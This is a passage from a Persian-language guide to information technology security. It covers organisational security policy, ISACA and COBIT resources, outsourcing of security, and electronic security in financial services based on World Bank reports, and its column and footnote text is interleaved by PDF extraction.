ﻣﺸﺘﺮﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ ﻭ ﻓﺮﻭﺵ ،ﻭ ﺍﺭﺍﺋـﻪ ﺁﻣـﺎﺭ
ﺩﻗﻴﻘﺘﺮ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺧﻂ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﺩ.
ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺍﻳﻦ ﺍﺻـﻼﺣﺎﺕ ﺑـﺪﻭﻥ
ﻣﺨﺎﻃﺮﻩ ﻧﻴﺴﺘﻨﺪ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ
ﻭ ﭼﻪ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﻲ ﻛﻪ ﻛﻤﺘﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺁﻳﻨـﺪ ﺻـﺪﻕ
ﻣﻲﻛﻨـﺪ .ﺩﺭ ﺍﻳـﻦ ﺑﺨـﺶ ،ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ ﺣـﻮﺯﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﻛـﻪ ﺷـﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ ﻭ ﻛﻮﭼـﻚ ﻭ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ
ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻣـﻲﺷـﻮﻧﺪ ﻣـﻮﺭﺩ
ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﻗﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻳﻦ ﺑﺨـﺶ ﺑـﺎ ﺗﻮﺟـﻪ
ﺧﺎﺹ ﺑﻪ ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻭﺍﻳـﺮ ﺍﺟﺮﺍﻳـﻲ ،ﻣـﺪﻳﺮﺍﻥ ،ﻭ
ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ،ﻣـﺸﺘﺮﻳﺎﻥ ،ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻭ
ﺩﻳﮕﺮ ﺍﻓﺮﺍﺩ ﺫﻳﻨﻔﻊ ﺩﺭ ﺷﺮﻛﺖ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﺳـﺖ.
ﻓﻬﺮﺳــﺘﻬﺎﻱ ﻛﻨﺘــﺮﻝ ١٣ﻭ ﻳﺎﺩﺩﺍﺷــﺘﻬﺎﻱ ﺭﻭﺍﻝﻣﻨــﺪ ١٤ﺑﺮﺍﺣﺘــﻲ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳﻂ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﺩﻭﻟﺘـﻲ ﻳـﺎ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ.
ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﭼﻪ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺗﻬﻴﻪ ﺷﻮﻧﺪ ﻭ ﭼﻪ ﺧـﺎﺭﺝ ﺍﺯ
ﺁﻥ ،ﺑــﺎﺯ ﻫــﻢ ﺗﻮﺳــﻌﻪ ﻭ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺯﻳﺮﺳــﺎﺧﺘﻬﺎ ،ﺳﻴﺎﺳــﺘﻬﺎ ،ﻭ
ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻏﺎﻟﺐ ﺷﺮﻛﺘﻬﺎ ﭼﻴﺰﻱ ﺟﺰ ﺑﺮﻗﺮﺍﺭﻱ ﺗـﻮﺍﺯﻥ
ﻣﻴﺎﻥ ﺿـﺎﺑﻄﻪﻫـﺎ ﻧﺨﻮﺍﻫـﺪ ﺑـﻮﺩ .ﻣﻘﺎﻣـﺎﺕ ﺍﺟﺮﺍﻳـﻲ ،ﻣـﺪﻳﺮﺍﻥ ،ﻭ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻫﻤﻴـﺖ ﺩﻫﻨـﺪ ﻭ ﺑـﺎ ﺗﻌﺮﻳـﻒ
ﺍﻫﺪﺍﻑ ﺭﺳﻤﻲ ﻭ ﺭﺷﺪ ﺣﺪﺍﻗﻞ ﺳﺎﺯﻣﺎﻥ ،ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺗﻮﺍﺯﻥ ﻣﻴـﺎﻥ
ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺭﻭﻱ ﺍﻣﻨﻴﺖ ،ﻳﻚ ﻣﻌﻴﺎﺭ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻌﻴﻴﻦ ﻛﻨﻨﺪ.
ﻭﻗﺘﻲ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺳﻴﺪ ،ﻣﺪﻳﺮﻳﺖ ﻧﺒﺎﻳـﺪ
ﺍﻫﻤﻴﺖ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻣﻤﻴﺰﻳﻬﺎﻱ ﻣـﻨﻈﻢ ﻃـﺮﺡ
ﻼ
ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻛﻨﺪ .ﺗﻐﻴﻴﺮﺍﺕ ﺭﺍﻳﺎﻧﻪ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺷﺒﻜﻪ ،ﻣﺜ ﹰ
ﺍﺯ ﻧﻮﻋﻲ ﻛﻪ ﺑﻪ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﺘﻦﺑﺎﺯ ١٧ﻣﻨﺤـﺼﺮ ﺍﺳـﺖ،
ﺑﻪ ﺑﺮﺭﺳﻲ ﻛﺎﻣﻞ ﻃﺮﺡ ﺗﻔﺼﻴﻠﻲ ﺍﻣﻨﻴﺖ ﻧﻴﺎﺯ ﺩﺍﺭﺩ .ﺑﻄﻮﺭ ﺧﻼﺻـﻪ
ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﻳﻚ ﻋﻠﻢ ﺑﺎﺷﺪ ﻳﻚ ﻫﻨﺮ
ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺗﺄﺛﻴﺮﮔـﺬﺍﺭﻱ ﻣﻮﻓـﻖ ﺁﻥ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ
Information System Audit and Control
)Association (ISACA
۱۶
15
ﺑﺮﺍﻱ ﺁﮔﺎﻫﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﻳﻨﺪﺓ ﺍﻳﻦ ﺍﻧﺠﻤﻦ ﺑﻪ ﭘﺎﻳﮕـﺎﻩ ﺁﻥ ﺩﺭ ﺁﺩﺭﺱ
ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
http://www.isaca.org
ﺍﻳﻦ ﻣﻄﺎﻟﻌﻪ ﺑﺎﻋﺚ ﺷﺪ ﻛﺸﻮﺭ ﺍﺭﻭﮔﻮﺋﻪ ﻳﻚ ﻛﺸﻮﺭ ﻣـﻮﺭﺩ ﻋﻼﻗـﻪ ﺑـﺮﺍﻱ
ﻣﻄﺎﻟﻌﺔ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﺷﻮﺩ ):(۱
http://www.isaca.org/ct_case.htm
ﻋﻼﻭﻩ ﺑﺮ ﺭﻭﺍﻟﻬﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﺍﺧﻠـﻲ ،ﺑﻌـﻀﻲ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﻧﺪ ﺗﺄﻣﻴﻦ ﻧﻴﺎﺯﻫـﺎﻱ
Checklist
Procedural Notes
13
14
(http://www.isaca.org/cobit.htm) COBITﻳﻚ ﺑﺴﺘﺮ ﺑﺮﺍﻱ
ﻣﻨﺎﺑﻊ ﻣﻨﺎﺳـﺐ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴـﻚ ﺟﻬـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ،
ﻛﺎﺭﺑﺮﺍﻥ ،ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ،ﻛﻨﺘﺮﻝ ،ﻭ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺖ ﺍﺭﺍﺋـﻪ
ﻛﺮﺩﻩ ﺍﺳﺖ .ﺑﺮﻗـﺮﺍﺭﻱ ﺗﻤـﺎﺱ ﺑـﺎ ISACAﺑـﻪ ﺷـﻤﺎ ﺩﻳـﺪ ﺧـﻮﺑﻲ ﺍﺯ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻓﻌﻠﻲ ﻭ ﺁﺗﻲ ﺍﻧﺠﻤﻦ ﻣﻲﺩﻫﺪ.
Open Source Software Packages
17
ﺑﺨﺶ ﺳﻮﻡ
.۱
ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﺠﺎﺭﻱ ﺑﺎ ﻣﺸﺘﺮﻳﺎﻥ ،ﻓﺮﻭﺷﻨﺪﻩﻫﺎ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ
ﻫﻤﻜﺎﺭ ﺑﻬﺒﻮﺩ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ؛
ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻭﺍﮔﺬﺍﺭ ﻛﻨﻨﺪ .ﺩﺭ ﺟﻬﺎﻥ
ﺻﻨﻌﺘﻲ ﺑﻌﻀﻲ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺍﻇﻬﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺳﭙﺮﺩﻥ ﺧـﺪﻣﺎﺕ
ﻏﻴﺮ ﻛﻠﻴﺪﻱ ﻣﺜﻞ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ
ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺣﺪﺍﻗﻞ ﺗﺎ ﺩﻩ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎ ﻫﻤﭽﻨﺎﻥ ﻳﻚ
ﺍﺳﺘﺮﺍﺗﮋﻱ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ﺑﻌـﻀﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻋﻼﻗـﺔ
ﺧﺎﺻﻲ ﺑﻪ ﺗﺄﻣﻴﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺟﻬﺎﻧﻲ ﺑﻮﻳﮋﻩ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺍﺭﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﻧﺠﻤﻦ ﻛﻨﺘـﺮﻝ ﻭ
ﻣﻤﻴﺰﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺕ ) ١٥(ISACAﺩﺭ ۶۰ﻛﺸﻮﺭ ﻫﻤﻜﺎﺭ
ﺗﺠﺎﺭﻱ ﺩﺍﺭﺩ ﻭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺘﻔـﺎﻭﺕ
ﺭﺍ ﺑــﺼﻮﺭﺕ ﺁﺯﺍﺩ ﺍﺭﺍﺋــﻪ ﻣــﻲﻛﻨــﺪ ISACA ١٦.ﻫﻤﭽﻨــﻴﻦ ﻳــﻚ
ﭼﺎﺭﭼﻮﺏ ﻛﻨﺘﺮﻝ ﻭ ﺭﺳﻴﺪﮔﻲ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨـﺪ ﻭ
ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨــﺎﺑﻊ ﺧــﺎﺭﺟﻲ ﻓﻬﺮﺳــﺘﻬﺎﻱ ﻛﻨﺘــﺮﻝ ﺍﺭﺍﺋــﻪ
ﻣﻲﻧﻤﺎﻳﺪ.
١٢٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻫﻤﻔﻜﺮﻱ ﻭ ﻫﻤﺎﻫﻨﮕﻲ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺘﻔﻜﺮﺍﻥ ﺧـﻼﻕ ﺟﺎﻣﻌـﻪ
١٨
ﻧﻴﺎﺯ ﻣﻲﺑﺎﺷﺪ.
۱۸
ﺑــﺪﻟﻴﻞ ﺍﻓــﺰﺍﻳﺶ ﺭﺧــﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺩﺭ ﺳﺮﺍﺳــﺮ ﺟﻬــﺎﻥ ،ﺗﻌــﺪﺍﺩﻱ ﺍﺯ
ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ ﮔﺰﺍﺭﺷﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺗـﺄﺛﻴﺮﺍﺕ
ﺟﻬﺎﻧﻲ ﺁﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻣﻨﺒـﻊ ﺯﻳـﺮ ﻣﺮﺍﺟﻌـﻪ
ﻛﻨﻴﺪ:
Ernst & Young's 2003 Global Information
Security Survey:
http://www.ey.com/global/download.nsf/US/TS
RSGlobal_Information_Security_Survey_2003
_/$file/TSRS_Global_Information_Security_Survey_2003.p
df
١٢٧
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻲ
ﺟﺪﻳﺪ ﺩﺭ ﺗﻤﺎﺱ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﻣﻨـﺎﻓﻊ ﺑـﺎﻟﻘﻮﺓ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺟﻬـﺎﻧ ﹺ
ﺟﻮﺍﻣﻊ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﻫﺴﺘﻨﺪ ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻬﻴﻨﻪ ﺍﺯ
ﺍﻳﻦ ﺑﺎﺯﺍﺭﻫﺎ ﻣﻴﺴﺮ ﻧﻤﻲﺷﻮﺩ ﻣﮕـﺮ ﺑـﺎ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻣﺤـﻴﻂ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ .ﺑﻪ ﻫﺮ ﺗﺮﺗﻴﺐ ،ﺭﻭﻧﺪ ﺣﺮﻛﺖ ﺍﻗﺘﺼﺎﺩ ﺟﻬـﺎﻧﻲ ﺑﺤـﺚ
ﻋﻤﻴﻘﻲ ﺩﺭﺑﺎﺭﺓ ﺗﺠﺎﺭﺕ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻧﻮﻳﻦ ﺭﺍ ﻣﻲﻃﻠﺒﺪ :ﭼﮕﻮﻧﻪ
ﺑﺎﻳﺪ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ٢٢ﺭﺍ ﺗﻌﺮﻳـﻒ ﻭ ﺍﺯ ﺁﻥ ﻣﺤﻔﺎﻇـﺖ ﻛـﺮﺩ؟،
ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺩﻳﺠﻴﺘﺎﻝ ﭼﻪ ﻣﻌﻨﺎ ﻭ ﻣﻔﻬـﻮﻣﻲ
ﺩﺍﺭﻧﺪ؟ ،ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﺳﻄﺢ ﻣﻨﺎﺳـﺒﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺭﺍ ﻣـﺸﺨﺺ
ﻛﺮﺩ؟ ،ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ،ﭼﮕﻮﻧـﻪ
ﺺ ﺑﺎﺯﮔﺸﺖ ﺳﺮﻣﺎﻳﻪ ) ٢٣(ROIﺭﺍ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻧﻤﻮﺩ؟
ﺑﺎﻳﺪ ﺷﺎﺧ ﹺ
ﻓﺼﻞ ﺩﻭﻡ
ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﻭﺷﻬﺎﻱ ﻛﺎﻫﺶ ﺁﺛﺎﺭ
١٩
ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻛﻠﻴﺎﺕ
ﺍﻣﻨﻴﺖ ﺩﺭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺩﺭ ﭼﻨﺪ ﻣﻘﺎﻟـﺔ ﺟﺪﻳـﺪ ،ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻌﻨـﻮﺍﻥ ﻣـﺴﺌﻠﻪﺍﻱ
ﺣﻴﺎﺗﻲ ﺩﺭ ﺗﻮﺍﻧﻤﻨﺪ ﺳﺎﺧﺘﻦ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ٢٠ﺑـﺮﺍﻱ
ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺍﻧﺘﻈـﺎﺭﺍﺕ ﺳـﺎﺯﻣﺎﻥ ﻭ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺍﺭﺍﺋـﻪ ﻣﻨـﺎﻓﻊ
ﻓﻨﺎﻭﺭﻱ ﻣﻌﺮﻓﻲ ﺷﺪﻩ ﺑﻮﺩ ٢١.ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎ ﻗﻠـﺐ ﺍﻗﺘـﺼﺎﺩ
۱۹
ﺍﻳــﻦ ﻓــﺼﻞ ﺑــﺎ ﻛﻤــﻚ ﻳــﻚ ﮔــﺰﺍﺭﺵ ﻛــﻪ ﺑﻮﺳــﻴﻠﺔ Thomas
،Tom Kellerman ،Glaessnerﻭ Valerie McNevin
۲۱
McNevinﺍﺯ ﺟﻤﻠﻪ ﻛﺘﺎﺏ ﺯﻳﺮ ﺭﺍ ﺑﺒﻴﻨﻴﺪ:
"Electronic Safety and Soundness: Securing
"Finance in a Digital Age, Public Policy Issues
)(October 2003
ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﻫﺮ ﺍﺑﺰﺍﺭ ،ﻓﻦ ،ﻳـﺎ
ﻓﺮﺁﻳﻨﺪﻱ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺳـﺮﻣﺎﻳﻪﻫـﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻳـﻚ
ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺭﺯﺵ
ﻳﻚ ﺷﺒﻜﻪ ﺭﺍ ﺯﻳﺎﺩ ﻣـﻲﻛﻨـﺪ ﻭ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻧـﺮﻡ ﻭ ﺳـﺨﺖ
ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳـﺖ .ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻧـﺮﻡ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ،
ﻓﺮﺁﻳﻨﺪﻫﺎ ،ﭘﺮﻭﺗﻜﻠﻬﺎ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ
ﮔﺮﻓﺘﻦ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫـﺎ ﺟﻠـﻮﮔﻴﺮﻱ ﻣـﻲﻛﻨﻨـﺪ .ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ
ﺳﺨﺖ ﻧﻴﺰ ﻣﺘﺸﻜﻞ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺮﺍﻱ
ﺍﻳﻦ ﺭﺳﺎﻟﻪ ﺍﻭﺝ ﺗﻼﺷﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻪ ﺳﺎﻝ ﺍﺧﻴﺮ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﻭ ﺑـﻪ
ﺍﺭﺍﺋﻪ ﭼﻨﺪ ﻣﻘﺎﻟﻪ ﻣﻨﺠﺮ ﺷﺪﻩ ﺍﺳـﺖ .ﭼﻨـﺪ ﻣﻘﺎﻟـﺔ ﺩﻳﮕـﺮ ﺍﺯ ﺍﻳـﻦ ﺩﺳـﺘﻪ
ﻣﻘﺎﻻﺕ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﺩﺭ ﺳﺎﻝ ۲۰۰۲ﺑﺮﺍﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺗﻬﻴﻪ ﺷﺪ ﺑﻪ ﻧﮕﺎﺭﺵ ﺩﺭ ﺁﻣﺪﻩ ﺍﺳﺖ:
"Electronic Security: Risk Mitigation in
Financial Transactions.":
http://wbln0018.worldbank.org/html/FinancialS
ectorWeb.nsf/SearchGeneral?openform&ESecurity/E-Finance&Publications
E-Finance
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ،ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ Kellerman ،Glaessnerﻭ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻴﺴﺖ؟
20
“Electronic Security: Risk Mitigation in
Financial Transactions” (May 2002, June
2002, July 2002),
“Electronic Finance: A New Approach to
Financial Sector Development?” (2002),
“Mobile Risk Management: E-Finance in the
)Wireless Environment” (May 2002
ﻛﻪ ﻫﻤﮕﻲ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻫﺴﺘﻨﺪ:
http://www.worldbank1.org/finance
Privacy
Return on Investment
22
23
ﺑﺨﺶ ﺳﻮﻡ
ﺍﻳﻦ ﻓﺼﻞ ﺍﺯ ﻛﺘﺎﺏ ﺑﻪ ﺷﻨﺎﺳﺎﻳﻲ ،ﺗﻌﺮﻳﻒ ،ﻭ ﺑﺤﺚ ﺩﺭ ﻣﻮﺭﺩ ﻳـﻚ
ﻣﺠﻤﻮﻋــﻪ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻫــﺸﺖ ﺭﻛﻨــﻲ ﻭ ﻧﻴــﺰ ﻳــﻚ
ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻲ ﺟﻬﺖ ﺗﻘﻮﻳﺖ ﻣﺤﻴﻂ ﺍﻣـﻦ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺮﺍﻱ
ﺑﺨﺶ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻲﭘﺮﺩﺍﺯﺩ .ﺍﻳﻦ ﺑﺨﺶ ﺑﺮﺍﻱ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻧﻲ
ﻛﻪ ﺑﺎ ﺍﺭﺍﺋﻪﺩﻫﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ -ﺑـﻮﻳﮋﻩ ﺩﻭﺍﻳـﺮ ﺍﺟﺮﺍﻳـﻲ،
ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ ،ﻭ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺖ -ﻛﺎﺭ ﻣﻲﻛﻨﻨـﺪ
ﺗﻬﻴﻪ ﺷـﺪﻩ ﺍﺳـﺖ .ﻧﻜـﺎﺕ ﻓﻨـﻲ ﺍﻳـﻦ ﺑﺨـﺶ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻴﻜﻪ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺭﺍﻫﺒﺮﻱ ﻣﻲﻛﻨﻨـﺪ ،ﺑﺎﺯﺭﺳـﻴﻦ
ﺑﺎﻧﻜﻬﺎ ﻛﻪ ﻛﺎﺭﺁﻳﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻣـﻲﻛﻨﻨـﺪ ،ﻭ
ﻛﺴﺎﻧﻴﻜﻪ ﺑﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺫﺍﺗﻲ ﻭ ﺭﻭﺯﻣﺮﺓ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
